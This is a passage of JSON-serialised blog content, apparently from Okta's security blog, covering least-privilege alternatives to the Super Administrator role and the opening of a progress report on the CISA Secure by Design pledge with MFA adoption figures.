Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s no-code automation tool, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/platform/workflows/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", is a powerful application and an addictive administrative experience for administrators that want to automate identity-related operations without writing code. Given the breadth of tasks an administrative user can automate with Workflows, creating and modifying a Workflow historically required the Super Administrator role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The great news is, you don’t need the Super Admin role for this any longer!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/access-control/access-control-get-started.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Role-Based Access Control for Workflows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (now in Early Access) provides a choice of three distinct roles scoped exclusively to the Workflows app. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Administrator\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is assigned within the Okta Admin Console, and provides administration capabilities within Workflows. This role can be requestable using Okta's ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Connection Manager\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a permission assigned within Okta Workflows, and grants the ability to create or modify connections. This is useful for any service accounts required to authorize connections.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Workflows Auditor\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" is a permission assigned within Okta Workflows, that grants “read only” permissions to view everything in Okta Workflows, but no ability to modify anything.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While we’re on the subject, the Authentication Policy for the Workflows app should be at least as strong as what is required for access to the Okta Admin Console.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A least privilege approach to Workflows would be to:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Create and test Workflows in your Preview or Test Org\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once the flow is ready for prime time, export it as a .flow or .folder file\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Request JIT access to the Workflows Administrator role using govern Okta admin roles in the production org \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Import the .flow or .folder file and configure any required connections\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Ensure that your production Workflows app has only been granted the OAuth scopes that your flows require.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"4 - A Custom Admin Role to manage Access Requests\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/products/identity-governance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Governance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" provides simple, convenient tools for taking the complexity out of tasks like managing user requests to access applications and running scheduled user access reviews (access certifications) as a layer of governance over that access.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"From a security perspective, the ability to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"create\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" access requests flows and modify their conditions is a fairly privileged affair. Out of the box, an Okta Org has a choice of two roles that can do this:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user with the Super Administrator role, or\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A user with the Access Request Admin role \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"and\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" the Application Admin role for the application the flow provides access to. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Creating a Custom Admin Role for the second option gives you everything you need to create and modify access requests, without the excessive permissions of a Super Administrator. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The one exception to this is if you’re using Access Requests to govern access to Okta Admin Roles, as opposed to user roles in downstream applications. This is where things start to get a bit \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"meta\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". If as an administrator I have the ability to set the conditions via which a user can request access to a role with administrative permissions, I effectively have the same level of privileges as an administrator that can grant privileges directly. So to create and modify access requests for Okta admin roles, I must be a Super Administrator. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"5 - Delegated Permission to Read or Invoke Workflows\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"More good news: you also no longer need Super Administrator permissions or Workflows RBAC permissions to simply invoke (run) a Workflow in Okta. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An administrator with lower permissions can invoke (run) a flow using a feature called \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/access-control/access-control-permission-changes.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"delegated flows\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". Using this feature, service desk personnel can be granted permission to \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/wf/en-us/content/topics/workflows/execute/run-delegated-flow.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"start\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" a specific flow using their limited access to the Okta Admin Console, without accessing the Workflows app directly. Service desk personnel won’t be able to modify or even view a flow assigned to them, but they can interact with it under whatever constraints you design. You can probably imagine any number of other use cases for this outside the Service Desk too.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"6 - Use API Service Integrations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Another way to avoid the use of the Super Administrator role is to embrace \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/build-api-integration/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integrations\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", especially for security use cases.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Using API Service Integrations, access doesn’t require the role of a highly privileged service account created by a user. API Service Integrations access Okta APIs in the context of an application using the OAuth 2.0 Client Credentials flow. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/04/24/api-integrations\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"several reasons\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" why this delivers a stronger security outcome. Each access token enables the bearer to perform specific actions on specific Okta endpoints, instead of whatever actions are available under a role.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You can generally judge a security vendor’s commitment to least privileges by whether they have an API Service Integration available. We’d like to give a big hat tip to Sysdig, Datadog, Kandji, Palo Alto, Elastic, Wiz and others that made this commitment good and early! \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"7 - Delegated Permission to Read Privileged Users\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Given Okta’s commitment to least privilege access, an account with Super Administrator permissions is required to view or modify information about other Okta administrators. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As such, the standard Read Only Administrator role in Okta can view information on regular user accounts, but not information (such as assigned role, resource and permissions) about accounts with administrative permissions.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As we mentioned above, third party security providers should use an OAuth-powered \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/build-api-integration/main/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"API Service Integration\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", which sets permissions at the application context and does not require a service account. API Service Integrations provide numerous advantages when it comes to reducing the blast radius of a stolen API token, as \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/blog/2023/09/25/oauth-api-tokens\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"this blog\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" neatly summarizes. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, you may have observed other third-party security tools (such as posture management or “ITDR” apps) request that Okta customers create a service account assigned with the Super Administrator role, use this account to create a static API token, and hand over the token to the third-party for ongoing access. This integration pattern often results in over-privileged accounts. And it really doesn’t need to be this way.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the vendor hasn’t built an API Service Integration and continues to insist on the use of static bearer tokens, you can more likely give the app a custom admin role and avoid using the Super Admin role. You might consider, for example, adding the identity and access management\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"permission (okta.iam.read) to the standard\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" Read Only Administrator \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"role. The IAM permission provides read-only access to roles, resource sets, and admin assignments, without adding unnecessary attack surface.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Next steps \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"So we’ve now established that a large number of tasks no longer require the Super Administrator role. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"However, we continue to need Super Admin to assign administrative permissions or to modify administrator accounts. That makes the Super Administrator role itself a prime candidate for a time-bound role, available on-demand after more than one other user in a trusted group of administrators approve the access using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Your next task is to think about what \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"baseline\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" permissions you’ll give to groups of administrators at your organization. What are the tasks they perform so frequently, that it would be impractical to have to go through some form of access request every time? Don’t forget that you can bundle standard roles, custom roles and resources together to create a baseline role best suited to your organization’s structure and risk appetite.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In our next blog on identity governance, we’ll dive deeper into creating access requests using the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/en-us/content/topics/security/governance-admin-roles/govern-admin-roles.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"govern Okta admin roles\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" feature.\",\"marks\":[],\"data\":{}}]}]}"},"summary":{"summary":"The first step in your journey to Zero Standing Privileges is to reduce the standing assignment of highly privileged roles."},"updatedAt":"2025-02-09T23:55:08.837Z","secAuthor":[{"id":"4fcb85f0-473e-57ff-b1d4-6f7dc8281c69","bio":{"bio":"Kalpana has worked in product management roles as numerous technology startups prior to joining Okta in 2022. Kalpana has built product capabilities that enhance and protect the administrative experience in the Okta Workforce Identity Cloud, including for delegated administration, custom admin roles and protected actions. "},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/6dS0ZBKl6KfE5MZFgQgzLR/b01384c225380a07bdf6d09c3378af0b/kalpana.png"},"name":"Kalpana Adlakha","jobTitle":"Senior Product Manager","slug":"/hackers/kalpana-adlakha","node_locale":"en"},{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"Brett Winterford is Vice President of Okta Threat Intelligence. Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats. Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank. Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.
"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"}]},{"slug":"/cisasecurebydesign1","id":"4db88005-1d91-5e97-bc6d-83e6171c1284","title":"Okta’s Ongoing Commitment to Secure By Design","date":"2024-10-31T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Introduction\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is determined to raise the bar for cloud security.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In May 2024, Okta was one of the first technology providers to sign the CISA Secure by Design pledge. The pledge commits enterprise software companies to make a “good faith” effort to meet seven high-level Secure by Design goals within the course of a year.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This document assesses Okta’s progress against this pledge. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"To date, we have found it straightforward to demonstrate toward these goals in the vast majority of Okta products. We found it more challenging to be able to commit to achieving these goals in 100% of our products and operations. It has been a valuable exercise to hunt down and engineer solutions to those edge cases that prevent us from being able to state that we meet these goals \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"without exception\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Goal\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-header-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Status as at October 2024\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce use of default passwords\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Reduce common classes of vulnerabilities\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Drive improved customer patching hygiene\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On Track\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Publish a Vulnerability Disclosure Policy\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Provide transparency on vulnerabilities\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Completed\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deliver improved logging and monitoring for customers\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In Progress\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While technically at the midway point of the exercise, I want to stress that Okta’s commitment to security best practices does not end when the one-year mark is up in May 2025. Okta is engaged in a long-term initiative to lead the industry in the fight against Identity-based attacks - what we call the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/au/secure-identity-commitment/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Secure Identity Commitment\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"On that basis, we would not be opposed to CISA expanding its list of goals and making “Secure by Design” a multi-year program. At Okta, we have \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2024/10/oktas-mission-to-standardize-identity-security/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"big ideas\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" about the security features enterprise applications will need to have in place to handle emerging threats via IPSIE, a new open standard for identity in the enterprise. We stand ready to engage with CISA and our industry partners to shape a more resilient and secure future for cloud services. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"R2QhsAJt5os9D5f5gh37A\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"hr\",\"data\":{},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1. Drive Adoption of Multi-Factor Authentication\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"blockquote\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\\"Within one year of signing the pledge, demonstrate actions taken to measurably\\nincrease the use of multi-factor authentication across the manufacturer’s products.\\\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Current State\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Multifactor authentication is proven to be one of the most cost-effective and universally applicable security controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta boasts a \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.itnews.com.au/news/mfa-took-off-in-the-covid-era-okta-says-596916\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"best-in-class record\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" for adoption of multi-factor authentication among both users and administrators of the Workforce Identity Cloud. We publish statistics about MFA adoption, use, and performance via the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/sites/default/files/2024-10/Secure%20Sign-in%20Trends%20Report%202024.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-In Trends\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" report. This report records the relative growth and decline in total MFA use and the use of specific authenticators. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"As of January 2024, 91 percent of administrators and 66 percent of users of Okta Workforce Identity signed in to an application using multifactor authentication. This represents close to a doubling of MFA usage since the months prior to the COVID-19 pandemic.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The passwordless, phishing-resistant sign-in methods supported in Okta Workforce Identity (Okta FastPass and FIDO2 WebAuthn) recorded the fastest growth as of January 2024. The growth of Okta FastPass was most impressive: this passwordless method climbed from 2% of users by the end of 2022 to 6.4 percent of users (and 13% of administrative users) in January 2024. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There are several reasons Okta has historically outperformed the industry in terms of voluntary MFA adoption:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta has made MFA accessible to all users:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Several sign-in methods (Okta Verify OTP and Okta FastPass) are available to all customers in the latest version of the Okta Workforce platform, Okta Identity Engine, released in 2022. These MFA methods are available to customers for use as a second factor irrespective of whether a customer is licensed for the Okta MFA solution.\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta is driving adoption of passwordless factors: \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Identity Engine is a policy engine that allows for password-optional authentication flows for secure access to workforce applications. This frees up organizations to optionally phase out the use of passwords for designated user populations on modern 